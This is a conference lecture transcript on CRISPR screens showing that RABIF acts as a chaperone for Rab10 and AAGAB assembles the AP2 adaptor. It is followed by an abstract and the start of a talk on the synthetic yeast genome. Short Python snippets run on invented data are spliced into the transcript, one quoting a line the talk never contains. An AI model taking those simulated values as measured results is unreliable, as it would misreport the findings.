you're probably going to... well, I think I remember you told me you didn't believe RABIF was a GEF from the very beginning. But I have to say that was kind of ahead of the field, because if you search the literature and search the motifs, this is the only information you get: the entire protein is annotated as a Rab GEF, of course a putative GEF. Now, what's a GEF? Rab GTPases are involved in vesicle tethering, and a Rab is a G protein. The Rab cycles between GTP- and GDP-bound forms, and the GTP-bound form is active. What a GEF does is promote GTP binding, so a GEF is a positive regulator of the Rab. The story of RABIF began 25 years ago with two papers published by Peter Novick's and Pietro De Camilli's groups. Their papers were mostly based on in vitro biochemical assays, and RABIF is also known as MSS4 or DSS4. This was the first putative GEF for Rab GTPases. Think about that: there are about 70 Rab GTPases in the human genome, and this protein was the first putative GEF. But surprisingly, decades later, its biological function was still unknown. Next we used CRISPR-Cas9 to knock out RABIF in adipocytes. In the wild-type cells here you can see insulin strongly promotes GLUT4 reporter translocation to the cell surface; all of these are flow cytometry-based analyses. But in the RABIF knockout cells you can see the translocation was largely abolished, and this confirms the screen data. Now, these are exocytosis assays. If you look at the slope of the curve, this represents the speed of exocytosis, and you can see that in the RABIF knockout cells exocytosis was strongly reduced. And we could fully rescue the exocytosis by introducing the wild-type RABIF gene. These are confocal images, which also confirm the flow cytometry data. In the wild-type cells you can see insulin relocates the GLUT4 reporter from intracellular compartments to the cell surface. I want to point out these are lipid droplets of the adipocytes, not nuclei.
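The hit-calling step mentioned above ("this equation to calculate the abundance of the single-guide RNAs") is, at its core, an enrichment comparison between the sorted and control populations, aggregated per gene. The sketch below shows a bare log2-enrichment version with invented counts and gene names; real screens use dedicated statistical tools rather than this simplified calculation.

```python
import math
from collections import defaultdict

# Hypothetical sgRNA read counts in sorted vs. unsorted populations.
sorted_counts   = {"RAB10_sg1": 900, "RAB10_sg2": 700, "CTRL_sg1": 60}
unsorted_counts = {"RAB10_sg1": 100, "RAB10_sg2": 120, "CTRL_sg1": 80}
total_sorted, total_unsorted = 1e6, 1e6   # library sizes for normalization

gene_scores = defaultdict(list)
for sg, n_sorted in sorted_counts.items():
    n_unsorted = unsorted_counts[sg]
    # pseudocount of 1 avoids log of zero for dropout guides
    lfc = math.log2(((n_sorted + 1) / total_sorted) /
                    ((n_unsorted + 1) / total_unsorted))
    gene_scores[sg.split("_")[0]].append(lfc)

for gene, lfcs in gene_scores.items():
    print(f"{gene}: mean log2 enrichment = {sum(lfcs) / len(lfcs):.2f}")
```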
And here is the boundary of the cells. In contrast, in the RABIF knockout cells you can see that insulin-stimulated GLUT4 translocation was largely abolished. And here I want to make an important point: the discovery of the first physiological function of RABIF finally made it possible to explore its molecular mechanism. Since RABIF is known as a Rab-binding protein, the first question we asked was: what is its Rab target? If we look at the screen again, RABIF was identified in the same screen as Rab10, which is a known regulator of GLUT4 exocytosis. So we speculated that maybe RABIF controls GLUT4 exocytosis by binding to Rab10. First we prepared the recombinant proteins and tested whether these two proteins bind to each other. This is the in vitro liposome co-flotation assay. Here we anchor the Rab10 protein in proteoliposomes, then we add soluble RABIF to the liposomes. After centrifugation, the liposomes migrate to the top of the gradient together with the bound proteins. Then we collect this fraction and analyze it by SDS-PAGE. So here I just want you to focus on this lane. You can see the Rab10 protein could bind to RABIF in the co-flotation assay, and the binding appeared to be stoichiometric. By contrast, protein-free liposomes could not bind any RABIF protein. So RABIF binds to Rab10 directly. And since RABIF is known as a putative GEF, we asked: can RABIF function as a Rab10 GEF? The structure of RABIF with Rab10 is still not known, but we do have the structure of the complex with Rab8, which is closely related to Rab10. Based on this structure, we found that there are several residues at the binding interface, so we introduced mutations, either single alanine mutations or a triple mutation, to disrupt the interaction. This is the in vitro GDP release assay, which is commonly used to analyze Rab GEFs. Without RABIF you see almost no change, but when we added wild-type RABIF you see rapid GDP release. And when we introduced the mutants, either a single mutant or the triple alanine mutant, you can see the GDP release rate was strongly reduced. If you look at the initial rate for the triple mutant, we estimate a large drop in the GDP release rate. So here came the surprise. When we introduced these mutants into the RABIF knockout cells, we found that these GEF-deficient mutants could rescue GLUT4 exocytosis to the same level as the wild-type gene. We repeated the experiments in multiple cell types under several different conditions, and we always got the same results. These data strongly suggest that RABIF is actually not acting as a GEF in GLUT4 exocytosis. Now, if RABIF is not a GEF, what is its biological function? Here came another surprise. When we looked at Rab10 expression in the RABIF knockout cells, we found that the protein disappeared. And we could rescue Rab10 expression using either the wild-type or the two mutant forms of RABIF. So the rescue of Rab10 expression correlated with the ability of these proteins to rescue GLUT4 exocytosis and had nothing to do with their in vitro GEF activities. Therefore we proposed that RABIF functions by stabilizing the Rab10 protein in GLUT4 exocytosis. To test this possibility, we also tried lentiviral expression of Rab10 in the knockout cells. This experiment is important because we had to rule out that RABIF controls the transcription or epigenetic regulation of Rab10 expression. Here we found that we could readily express Rab10 in the wild-type cells, but very little protein was observed in the RABIF knockout cells.
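For the GEF assay described above, the comparison between wild-type and mutant RABIF comes down to initial rates of GDP release. Below is a minimal sketch of how such rates could be extracted from release curves; the curves are simulated single exponentials and the rate constants are arbitrary, chosen only to mimic a strong wild-type effect and a weakened mutant, not to reproduce the measured values.

```python
import numpy as np

t = np.linspace(0, 600, 61)          # time points, seconds

def released(k_obs):
    """Fraction of prebound GDP released vs. time for a single-exponential process."""
    return 1.0 - np.exp(-k_obs * t)

def initial_rate(y):
    """Linear slope over the first few time points, in fraction released per second."""
    return np.polyfit(t[:5], y[:5], 1)[0]

curves = {
    "no GEF":        released(1e-4),
    "wild-type":     released(5e-3),
    "triple mutant": released(5e-4),
}
for label, y in curves.items():
    print(f"{label:13s}: initial rate ~ {initial_rate(y):.2e} /s")
```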
This data is consistent with the previous data I just showed you and supported the idea that RABIF stabilizes the Rab10 protein. When we treated the RABIF knockout cells with MG132, which is a proteasome inhibitor, we found that we could fully rescue Rab10 expression. And when we treated the cells with both MG132 and cycloheximide, which is a protein translation inhibitor, the rescue was abolished. This data suggests that without RABIF the Rab10 protein can be efficiently produced, but it is quickly degraded. So here we proposed two models. It's possible that RABIF stabilizes an intrinsically unstable Rab10 intermediate, so it's more like a chaperone. On the other hand, it's also possible that RABIF protects the folded Rab10 protein from proteasomal degradation, for example by masking so-called degrons. To distinguish between these two models, we reconstituted Rab10 and RABIF in E. coli cells. E. coli, as you know, doesn't have any Rabs or RABIF. We found that the Rab10 protein could be produced in E. coli without RABIF, but all the protein ended up in the insoluble pellet; we couldn't get any protein in the supernatant. We could extract soluble Rab10 protein only when RABIF was co-expressed. So RABIF stabilizes an unstable Rab10 intermediate, and without RABIF, Rab10 aggregates in E. coli, and in mammalian cells it misfolds and gets degraded by the proteasome. This supports the idea that RABIF is a molecular chaperone for Rab10, not a GEF. So here I call it a holdase chaperone, because it's different from the classical chaperones like HSP70 and HSP90, both of which require ATP-dependent cycles; RABIF is a small protein and it's not an ATPase. It recognizes the substrate and stabilizes the protein, which promotes its folding. We then performed mass spec analysis and identified two additional Rab proteins, Rab13 and Rab8, that are also regulated by RABIF. And this is our model: RABIF acts as a chaperone, it interacts with the substrates and stabilizes them, which promotes the folding of these Rab GTPases into their native conformation, so they can promote exocytosis. Without RABIF, the Rabs cannot adopt the native conformation and they get degraded by the proteasome. To summarize, we identified the first biological function of RABIF, which enabled us to discover the unexpected function of RABIF in Rab GTPase regulation. Because all the Rab GTPases function in a similar way, we expect that maybe this holdase chaperone model can also be applied to other Rab GTPases. Okay, let's return to this diagram. The surface level of a membrane protein is determined by the balance of exocytosis and endocytosis. Having talked about exocytosis, I'm now going to focus on endocytosis. Go ahead. Is this a chaperone for the Rab under steady-state conditions, or do cells have to go through something for this chaperone to be needed? Not in GLUT4 exocytosis, but I think that's an interesting point. Let's come back to yeast. This protein is conserved in yeast; it was cloned first in yeast, but when you knock out the protein there is no phenotype. So under normal conditions it's not essential in yeast. What I imagine is that maybe during stress conditions this protein is recruited to a trafficking pathway and becomes essential. But in GLUT4 exocytosis you always need it. Does it bind to both the GDP- and GTP-bound forms? So we didn't address that, but according to the known structure with Rab8, it actually binds to the nucleotide-free form, which I think suggests it acts more upstream, in the folding pathway.
And so far I don't think there is evidence showing that it binds to the nucleotide-bound form of Rab GTPases. Is it a chaperone or a co-chaperone? So, at least... It doesn't seem to bind ATP. No, no, it's a very small protein. What I can say is that this protein forms a direct complex at about a one-to-one ratio, and whether there is any additional protein bound to the complex we don't know yet. On the universality of this, I have a lot of questions. First, I presume these three are the only Rabs you've picked up. Right. So that's right: at least in the cell types we studied, these three Rabs are the only proteins controlled by RABIF. So the question is: are there other isoforms of RABIF in cells that could explain the other ones? And just a comment: Rabs are very nicely expressed in E. coli in general, and in my experience Rab8 is the only one that really is difficult. I haven't tested 10 or 13. But Rab8, of all the Rabs that I expressed in E. coli, was the only one that was very difficult to express. So my expectation would be that this is a very specialized thing for these three Rabs that you're finding there. And the question then becomes: what's special about the structure? So I think I can tell you something. When I showed this work to a colleague in the GLUT4 field, he said, finally there is an explanation for why they couldn't produce Rab10 in E. coli; they had to produce it in insect cells. And to come back to your question of whether anything is special about these three proteins: I've talked to people in the field, and there is no reason to believe they're special. And so you said that the other Rabs can be expressed readily in E. coli, but that doesn't really rule out that there is a bacterial chaperone that performs a similar function to promote folding. But again, it's all an open question. Can I just comment? First of all, I didn't say I don't believe, because I never said I don't believe; I said I don't think. That's not true. I don't believe, in quotes. You always say you don't believe. Not in science. Not in science, I just don't believe. Because I had a reason, because I knew all this data. Only in writing. What? You only say that in writing. I don't think. I don't think, especially when I have data. It's because it was only shown that GDP can be released, but not that GTP can be loaded, like other GEFs do. And here I just want to make a suggestion: maybe what's similar in these three is just the simple biochemistry of nucleotide affinity, their affinity for nucleotides. And the nucleotide-free state is known to be unstable for all GTPases. So maybe these three... But that's also true for all the other Rab GTPases; nucleotide-free Rabs are unstable. I know, but I'm saying maybe these three have lower affinity for nucleotides than all the other Rabs, and maybe that's why they need this. I agree, I think there are certainly many questions that need to be addressed. Yeah. So, related to that: if you get rid of the GAP, AS160, for Rab10 (so AS160 is a GAP), does it still have an effect? You mean repeat the experiments in the GAP knockouts? Because now you force Rab10 to be in the GTP-bound state. Okay. Yeah, that's a good idea. We haven't tested that, so it could be a next step. Okay, so, on to endocytosis. Here we performed a similar screen, and it's largely the same, but I want to point out the difference: here we didn't treat the cells with insulin; we sorted for the cells with high GLUT4 reporter on the plasma membrane without stimulation.
And the idea here is that we're going to recover the mutant cells defective in endocytosis. The screen recovered known regulators of endocytosis, such as AP2 adapter subunits (I'm going to come back to those shortly) and TBC1D4, which is actually an inhibitor of exocytosis. So not only can the screen recover endocytic regulators, it can also recover inhibitors of exocytosis. But again, most of the genes were not previously known to be involved in GLUT4 endocytosis. So here I'm going to focus on one gene, called AAGAB. But before that, I want to mention that the screen recovered subunits of the AP2 adapter complex. The AP2 adapter is a tetramer: two large subunits, alpha and beta, one medium subunit, mu, and one small subunit, sigma. Our screen identified AP2S1, which encodes the sigma subunit. We also identified AP2M1, which encodes the mu subunit. We didn't recover the alpha subunit, which is actually expected, because there are two genes, AP2A1 and AP2A2, and genetic screens cannot recover redundant genes. For the beta subunit, it's the same story: AP2B1 encodes the beta subunit, but the gene can be fully, I would say, compensated by AP1B1. So we couldn't recover alpha and beta, but the idea is fairly clear: we recovered AP2 adapter subunits. Now, what is AAGAB? If you ask someone in the field, nobody has heard about this protein. It's a 34 kDa soluble protein, which is why some people call it p34, the alpha- and gamma-adaptin binding protein; I'm going to come back to the naming shortly. It's known as Irc6p in yeast, but there's no phenotype in yeast. I'd like to mention that AAGAB is frequently mutated in a human disease called punctate palmoplantar keratoderma, PPK. These are haploinsufficiency mutations, which means just one allele is mutated; given the phenotype we see, if both alleles were mutated, apparently the organism could not survive. This disease is characterized by thickening of the skin of the palms and soles. And of course, how AAGAB mutations cause the disease is still unclear, and this is because we still don't know how AAGAB works. Again, we knocked out AAGAB in adipocytes using CRISPR-Cas9. You can see, if you focus on the orange bars, that the AAGAB knockout caused constitutive translocation of the reporter to the cell surface. So insulin regulation is disrupted: the reporter goes to the cell surface even without stimulation. We confirmed the flow cytometry data by confocal imaging. Again, in these wild-type cells, GLUT4 is mostly in intracellular compartments, but if you look at the AAGAB knockout cells, it's already on the cell surface, and the phenotype is very similar to AP2S1 knockout cells. AP2S1, as you remember, encodes a subunit of the AP2 adapter. Next we examined the endocytosis of the cargo. Here is a measurement of endocytosis using a fluorescently labeled antibody recognizing GLUT4; this is a very commonly used assay for endocytosis in the field. When we knocked out AAGAB, you can see that endocytosis of the cargo was abolished, and the phenotype was at least as severe as the AP2S1 knockout. The transferrin receptor is a classic endocytic cargo of clathrin-mediated endocytosis; when we knocked out AAGAB, there was a strong accumulation of the protein on the cell surface, and the phenotype was fairly similar to the AP2S1 knockout. This data clearly showed that AAGAB is essential for clathrin-mediated endocytosis. Now, I said virtually nothing is known about this protein.
The only hint came from yeast two-hybrid screens, probably two decades ago. Scottie Robinson's group found that AAGAB bound to the alpha subunit in yeast two-hybrid assays. However, we still didn't know whether this binding is a direct interaction, or whether the interaction has biological significance. Next we prepared recombinant proteins and tested for a direct interaction. With protein from E. coli, we found that the GST-tagged alpha subunit indeed interacted with AAGAB, whereas GST itself did not, and the interaction here appeared to be stoichiometric. Now, how does AAGAB regulate AP2 adapter formation? There's some background signal, but hopefully you can see that in the wild-type cells there are abundant AP2 puncta on the cell surface. But strikingly, when we knock out AAGAB, these puncta largely disappear, and this is accompanied by translocation of the GLUT4 reporter from intracellular compartments to the cell surface. We confirmed this confocal data by TIRF microscopy, which monitors events near the plasma membrane. So here again, in the wild-type cells we observed a large number of AP2 puncta, but they all disappeared in the AAGAB knockout cells. Here I can imagine two possibilities: maybe AAGAB is important for surface recruitment of the AP2 adapter, or it could be essential for the stability of the AP2 adapter. It turned out the second possibility was correct. When we knock out AAGAB, you can see the alpha subunit largely disappears; at the same time the beta subunit is strongly reduced, and the mu subunit is also abolished. Our antibody didn't work for sigma so far, but you get the idea: without AAGAB, the AP2 adapters were degraded. And of course this is highly reminiscent of the RABIF story I just told you. So we speculated that maybe AAGAB also stabilizes the AP2 adapter; since it binds to the alpha subunit, maybe it's a chaperone for the alpha subunit. And again, we reconstituted AAGAB and the alpha subunit in E. coli, which doesn't have AAGAB and doesn't have clathrin-mediated endocytosis. So here, if you look at the pellet (this is after extraction, and it represents the insoluble fraction), we could express the alpha subunit without AAGAB, but all the protein ended up in the pellet; we couldn't extract any protein into the supernatant. However, when we co-expressed AAGAB, now we could extract the protein in the supernatant. This again is similar to RABIF in the Rab10 story, and it suggests the alpha subunit itself is unstable: in bacteria it forms aggregates, and in mammalian cells it's recognized as a misfolded protein and degraded. On the other hand, AAGAB can bind to the alpha subunit and stabilize it. And therefore, by analogy, we think AAGAB is also a holdase chaperone for the alpha subunit. Next we looked at the subcellular localization of the protein. So this is the alpha subunit; on the plasma membrane you can see the puncta. But AAGAB, by contrast, shows a diffuse pattern, which is typical of the cytoplasm, which leads to our hypothesis: AAGAB actually regulates an upstream event in AP2 adapter formation, and it does not follow the AP2 adapter to the plasma membrane. One prediction from the chaperone model is that AAGAB function should be independent of its location in the cell. To test this possibility, we tethered AAGAB to the ER surface by fusing it to an ER membrane protein called ATF6, and this targets the protein to the ER surface. In this western blot you can see the fusion protein is expressed at a similar level as AAGAB, and there was no degradation.
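The TIRF comparison above (abundant AP2 puncta in wild-type cells, almost none in the AAGAB knockout) is typically reduced to a puncta count per cell or per field. Here is a toy version using synthetic images; the threshold and spot model are assumptions, and a real pipeline would add background correction plus size and intensity filters.

```python
import numpy as np
from scipy import ndimage

def count_puncta(img, threshold):
    """Count connected bright regions above a fixed intensity threshold."""
    labeled, n = ndimage.label(img > threshold)
    return n

rng = np.random.default_rng(2)
wt_img = rng.normal(100, 5, (256, 256))              # synthetic wild-type TIRF field
for y, x in rng.integers(5, 250, size=(300, 2)):     # sprinkle bright AP2-like spots
    wt_img[y - 1:y + 2, x - 1:x + 2] += 80
ko_img = rng.normal(100, 5, (256, 256))              # knockout: essentially no puncta

thr = 140
print(f"WT puncta: {count_puncta(wt_img, thr)}, AAGAB-KO puncta: {count_puncta(ko_img, thr)}")
```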
And, quite interestingly, we found that this fusion protein could, to a large degree, restore transferrin receptor endocytosis. Even though it's not as complete as the AAGAB rescue, it clearly showed that this ER-anchored protein can function. So AAGAB function is not dependent on its localization, which is consistent with a chaperone model. Now, this is a crucial test. A crucial prediction from the chaperone model is that forced expression of the alpha subunit should rescue the AAGAB knockout phenotype. Here we took advantage of a very strong, virus-derived promoter. When we overexpressed the alpha subunit, it could fully rescue transferrin receptor internalization, as well as the AAGAB rescue does. Overexpression of the beta subunit didn't work, and, as expected, expression of all four AP2 subunits could rescue. So I think we can draw two key conclusions from this data. The first is that restoring AP2 expression artificially can bypass the requirement for AAGAB, and all these data indeed suggest that AAGAB is a holdase chaperone for the alpha subunit. But I think AAGAB is more than just a chaperone, so I'm going to show you some data, and I look forward to your comments. What happens after AAGAB binds to the alpha subunit? To monitor AAGAB's interactions with the AP2 subunits, we developed an HA-tag system in which an HA tag is added to each of the four AP2 subunits. You can see this is sigma-HA, this is mu-HA, and alpha and beta migrate at the same position on SDS-PAGE. So here is the co-IP data. We found that AAGAB could pull down the alpha subunit, as expected, but it could not pull down the sigma subunit by itself. When we put in all four subunits, AAGAB could pull down the alpha subunit and the sigma subunit. We could never see the mu subunit. We also performed additional analyses with a different co-IP design using an untagged version of the alpha subunit; we could only see the alpha and sigma subunits, never the beta or mu subunits. And we confirmed this co-IP data using recombinant proteins; here I just want you to see this lane. We saw the sigma subunit bind to the alpha subunit and AAGAB. It's a very small protein, so the staining is very faint, but I think it's about a stoichiometric interaction. So the AAGAB-alpha subunit dimer subsequently recruits the sigma subunit. I'd like to put what I've talked about so far into this model. We think AP2 adapter assembly is not a spontaneous process, as previously assumed. Instead, it's a highly organized process. The initiator of the process is a dimer of AAGAB and the alpha subunit, and this dimer recruits the sigma subunit. Since the beta and mu subunits do not bind to AAGAB, we propose that they displace AAGAB from the alpha and sigma subunits, which allows formation of the tetramer. What happens after that is well known, so the story I just told you is a prequel to a story that has been told again and again. And what happens without AAGAB? The entire AP2 assembly process just collapses: all the subunits get degraded. In summary, we showed that AAGAB is a master regulator of AP2 adapter assembly. In addition to being a chaperone for the alpha subunit, we propose that maybe AAGAB can prevent AP2 from binding to non-cognate cytosolic proteins. Many cytosolic proteins contain dileucine signals, but they should not be recognized by AP2 adapters. If the AP2 adapter is fully formed, the beta subunit can block the binding site unless and until it's opened up on the plasma membrane. But what happens before beta can mask the binding sites?
And we propose that AAGAB may function by blocking the binding sites, to prevent binding to non-cognate proteins. Now, because other multimeric trafficking factors like AP1, AP3, and COPI face the same challenges of assembly and specificity, we think there may be other AAGAB-like molecules that control their assembly. Before I finish, let me return to the PPK disease. Here is a diagram of the skin cell contacts. The contacts between skin cells are built by a series of membrane proteins and cytosolic proteins, which include desmoglein, desmoplakin (DP here), and keratin. Interestingly, most of these proteins are also found to be mutated in PPK, along with AAGAB. The mutations of these genes make total sense, because you can imagine they are going to compromise the integrity of the skin cell contacts and therefore cause the skin disease. But how does AAGAB fit into the picture? Here I just want to show you a preliminary observation. We did a proteomic analysis of surface proteins in AAGAB knockout cells, and we found that AAGAB knockout downregulates a protein called desmoplakin: without AAGAB, the level of this protein on the surface was strongly reduced. Now, this is very preliminary data and more work needs to be done, but I think it has the potential to explain why AAGAB mutations can cause the skin disease. So before I wrap up, I'd like to convey the message that there are still many mysteries in endocytosis and exocytosis that need to be solved. Our screens identified many membrane proteins that show very strong knockout phenotypes, but virtually nothing is known about their biological functions, and if you do a sequence prediction you still get nothing. In my opinion, moving forward, a very exciting direction is to find out how these proteins regulate cargo flow in the cell. So with that, I'd like to thank the people who did all the work I showed you today: Dan and Lauren, the graduate students, and Haja, a postdoc. I'll return to this, and thank you for your attention. So, this is very cool that you're regulating AP2 assembly, but could you tell us why it's not lethal? Yeah, so I know clathrin knockout is lethal because of the trafficking from the Golgi; it's actually more lethal. And these are not on the list of essential genes. It's lethal: you eliminate AP2 and it's lethal. In cell culture? In animals I can understand; AP2 elimination is lethal in animals, if you eliminate it in animals, for sure. Why is this so important for the folding of AP2? The only phenotype that you're getting, as you said, is the PPK here. That's haploinsufficiency, so just one allele mutated. So, remember, I studied the vesicle fusion protein Munc18 for many years. Haploinsufficiency mutations of Munc18-1 only cause certain neuronal phenotypes; overall the patients are normal. So why are skin cells more sensitive? Maybe some mathematical modeling could help, I cannot tell. But overall I don't think other tissues are going to be that sensitive. And again, I agree: knocking out AP2 in animals is going to kill the animals. But at the cell culture level I don't think these are essential genes. Well, if you don't have AP2, cells divide, but they're very sick; there are cytokinesis problems, I mean, lots of issues. So I think you could be right, I think you are right. Or, these are clonal CRISPR knockout cells; eventually we select for the mutants that can grow. So it could be compensation. It could, well, it's not going to be phenotypic compensation. Or it could be hypomorphic mutations.
Reducing most of the activity, but with some residual activity that keeps the cells alive. Yeah. Well, when we knock out essential genes in the proteasome, the cells can sometimes grow better if you wait a few weeks. I know, but if you eliminate AP2, cells are sick as hell. So this actually can be directly checked. There is an essential gene list; we checked a couple of years ago, and I don't think these are essential genes, maybe surprisingly. At least not in the cancer cell lines; there are several screens. Well, I cannot say for normal cells, but at least in cancer cells they are not essential genes. Yeah, it's a comment about the RABIF story. If I understand, you showed it's a chaperone if you remove it, but I'm not so sure that this excludes the fact that the real function could be something else, because it's common to find situations in which you have a dimer in which both of the two proteins have real functions if you eliminate one. Can I just check this question? Do you check it on endogenous proteins or expressed proteins? Because for a chaperone it could be different. The Rab10, right? The Rab10 is all endogenous. And also, we could force-express Rab10 using a viral promoter; we restore the Rab10 protein and totally rescue the RABIF knockout phenotype. So I think your question has two parts. First, I think it's fairly clear that in our case it's a chaperone. But does it function in another way, could it be a GEF, in a different possible way? I don't think it's a GEF, but in that case I think it's possible. Is it completely clear that it doesn't help? I would call it a real function, a modulatory function on the activity of Rab10. But then of course it also stabilizes, and in general this is the case for other dimers. I think that's totally possible. For example, AAGAB: it is a chaperone, but I think, as I showed, it's more than that; it organizes the whole assembly pathway. Maybe RABIF is doing that also, stabilizing Rab10 but also controlling downstream function. Right now we just don't have the evidence. So, a quick follow-up on this, and then I have another question. Does it work on Sec4? Sec4? Yeah, okay, the yeast. Well, in yeast, I remember if you knock out the RABIF homolog you don't see anything. You see a little bit of effect only when you have a Rab mutation that you overexpress it to rescue. I think that only demonstrates those proteins interact. So we haven't tested yeast yet. But, yeah, I don't see how you can test a function without a knockout phenotype; it's kind of hard. So the other question was on the very last part of what you were saying about the phenotype. I was confused how downregulation of desmoplakin would have anything to do with endocytosis. Right, so I think this is going to be an indirect effect. We did a proteomics analysis, and knocking out AAGAB caused a massive imbalance in the surface proteins. A large number of proteins you either get too much of or too little of. I think it's going to be, for example, maybe a cargo adapter on the plasma membrane which is reduced, but in turn you get more of another protein because of a lack of inhibition. So I think it's going to be really hard to interpret at this moment. We don't know why it causes the disease; I just wanted to raise the possibility. And I think it can be an indirect effect. Or completely independent of the... Yeah, so in that case I would think we probably want to rescue AP2 and check it. So, yeah. I like your phenotype, which has to do with keratinocyte dysfunction; you know, you get this scaling part. Oh, which part? Oh yeah, that one.
Okay. Have you looked at... Is it the pit size in the patients? No, no, no, I was going to ask you whether you've looked at the organization of the cells. Do they maintain cell junctions? Yeah, so that's going to be a crucial experiment to study the disease. We're thinking to introduce precisely the same mutation into iPS cells and differentiate them into keratinocytes. I think that's going to tell us a lot about this protein's function. It could very well be that your protein, whatever the name is, AAGAB, is doing what it's doing, and it is involved in cell-cycle-specific cell junction disassembly. And that is being affected, and therefore what you end up with is a cell that does not disassemble desmosomes when it has to divide, and as a result what you end up with is a phenotype which is like dead cells. Right. But you're still thinking the more direct cause is the endocytosis effect. Right. I agree. So what happens downstream of AP2 we cannot say for sure; it's just speculation. Okay, so just two small comments and questions. Have you checked the mutations that cause the phenotype in the patients? That's right, so many of the mutations are actually premature terminations, right around the middle and the C terminus. We didn't make the precise mutation, but we have done a truncation which mimics the disease mutation, and that one was totally inactive. We saw the endocytosis effect, so in our assay you need the entire protein. So, you said at the end, and I think it's fascinating how extensive this notion is of how many chaperones help with folding, right? I mean, the same is true with Hsp90. Yeah. So we can talk more, but I think we're actually touching an even much bigger problem for multimeric complexes like AP2 or SNAREs. They are expressed at different chromosome locations, from different promoters. How do you coordinate their assembly when they're expressed at different levels? I think maybe this is one solution for that: you have an initiator from one subunit and just go from there, and for everything else, if they're expressed at somewhat different levels, it doesn't matter. If there's too much, it's going to get degraded; if too little, it's going to wait for the initiator to get ready. So I think this may be a general way to assemble multimeric proteins in mammalian cells. How sensitive? Well, at least in the AAGAB case it's very sensitive, because without AAGAB you don't get any AP2 adapters. What's your second question? So the question is, what are the other substrates? Yeah. So we have some preliminary data. Say AP1: the gamma subunit also disappears with AAGAB knockout. But delta-adaptin was normal, so AP3 was fine, but AP2 and AP1 were affected. So we can continue this in the panel discussion. It's okay. Thank you. Okay, thank you very much. Thanks.
|
Cargo proteins moving between organelles are transported by membrane-enclosed vesicles. The core engines mediating vesicle trafficking are now well established. However, we are only beginning to understand the regulatory networks superimposed upon the core engines to adjust the rate and direction of membrane transport according to physiological demands. The advent of the revolutionary CRISPR-Cas9 genome editing system enabled us to systematically identify new components of the regulatory networks. We developed new screening platforms and performed unbiased genome-wide CRISPR genetic screens to dissect the exocytosis and endocytosis of cell surface transporters, fundamental processes in cell physiology. Our screens identified known regulators but most of the hits were not previously known to regulate the pathways. I will focus on the unexpected mechanisms of RABIF/MSS4 in exocytosis and AAGAB in endocytosis. I will also discuss how the principles uncovered in our studies shed light on vesicle trafficking in general.
|
10.5446/50890 (DOI)
|
So, thank you to the organizers for inviting me. I really enjoyed the meeting. And sorry the previous talk ran over, but it was my fault for asking some of the questions. And thank you most of all to the AV guy for getting my talk to show up. So I was asked what to talk about, and I decided to send in a title about work that we've done on synthetic yeast genomes. But after hearing the earlier talk about organoids, I decided to throw in an organoid bonus about work that is going on in organoids in my lab in collaboration with Andy Ewald. So, Saccharomyces cerevisiae 2.0. The introduction to this is that in my previous life, before I was an academic at Johns Hopkins, I worked at a biotech company. The last product I worked on there was the 454 genome sequencer. It was really exciting at the time. This is a curve from 2003 showing that our machine was the world leader in DNA sequencing, only for a couple of years, however; then Illumina took over. So let's see. There. So this was our productivity, and then Illumina took over, and we had a couple more years on the market. But the curve I'll talk about is the one for productivity in writing DNA. The same way that DNA sequencing has been increasing in efficiency, so has DNA synthesis. These curves are from Rob Carlson, who's a biotech writer. And that stimulated a project to make a synthetic version of the yeast genome, called Saccharomyces cerevisiae 2.0. So, in order of appearance on the team: the overall concept for the project really goes back to Jef Boeke and Srinivasan Chandrasegaran, who were having coffee one day and talked about the possibility of maybe making synthetic yeast chromosomes. And shortly after that, when he was having trouble using DNA Strider to design entire chromosomes, he asked me and my group to get involved. So we've been responsible for the front-to-back informatics for the project. I got involved because I thought there would be some really interesting scientific questions; however, most of the time we spent writing workflow software. So we did all the software to design the synthetic yeast genome, to do all the ordering, to run all the laboratory work, to automate as many processes as we could, and then to analyze the synthetic cells that we got out, synthetic in that they have synthetic DNA. And then working with me were Sarah Richardson, who's now CEO of a synthetic biology biotech, MicroByre, Giovanni Stracquadanio, who's now faculty at the University of Essex, and Cunyong. And then other participants: Romain Koszul, who's in the back and spoke earlier today, has been working on comparing the 3D conformation of the chromosomes that we've synthesized with the native chromosomes, and then there are partners all across the world making different chromosomes. So about a year ago there was a series of papers. This figure was generated with data from Romain's lab, showing the synthetic chromosomes organized in the nucleus in the sort of goldish color, with the remaining wild-type chromosomes in the sort of whitish, grayish color. So we've made them, and the cells work. Here is progress to date. Yeast has 16 chromosomes, and in addition we've designed and are making a 17th neochromosome that has all of the tRNAs on it.
So, one of the changes that we made, and I'll go through the types of changes we made in the genome, is taking tRNAs from all of their native locations and putting them all together on one special chromosome, with the idea that possibly the other chromosomes will be more stable, because tRNAs are a place of DNA instability: because of the high transcription rate, DNA replication forks run into the transcriptional apparatus and you get DNA strand breaks. There's also the idea of orthogonalization, that a lot of synthetic biology has been driven by electrical engineers who think about designing orthogonal components. I don't think that idea has really gotten very far, but nevertheless we've decided to orthogonalize the genome by putting all the tRNAs onto one separate chromosome. So there you go. In blue are the chromosomes that have been completely synthesized, integrated into yeast cells, and are able to support yeast cell life with fitness that is pretty similar to wild type, so no real fitness defects. Part of what I'll talk about is the fitness defects that we found and what they were due to. In yellow are chromosomes that have not yet been completed: all the DNA has been synthesized, most of it has been assembled, and some of the chromosomes are completed but have fitness defects that we are still tracking down and getting rid of. We have single cells that have up to three synthetic chromosomes at this point. There's been no real barrier to getting synthetic chromosomes into a single cell. The barrier is more that it goes through a meiotic division, which causes recombination between the synthetic chromosome and the wild type, and then we have to do backcrosses, we as in Jef Boeke's lab, to get a fully synthetic chromosome. So, quickly, the changes that we've made. Housecleaning: we've taken off the original telomeres and put on a universal telomere sequence. A lot of pseudogenes accumulate in the subtelomere, and we've gotten rid of them. We've removed transposons and repeats, and removed introns. As I mentioned, we've got this neochromosome that has all the tRNAs. This is an interim version of the neochromosome: we're maintaining the copy number of the tRNAs from the wild-type genome on the tRNA neochromosome, and as we're doing the deletions we're adding the genes to the neochromosome. That work is being led at the University of Manchester now by Patrick Cai. We're also doing synonymous recoding, for two reasons. One is that some of the synthesis and assembly technologies have restriction enzyme requirements: either restriction enzymes are used to do part of the synthesis or assembly, or they're needed for late-stage restriction-ligation reactions. So sometimes we have to add and remove restriction enzyme binding sites, and we do that with synonymous recoding of protein-coding regions. We're also putting in watermarks, called in our hands PCR tags, where we take a protein-coding region and change the DNA sequence so that it is essentially unique in the genome; we have two recoded tags that are close enough together that we can easily make a PCR amplicon to check quickly that the DNA content is synthetic as opposed to wild type.
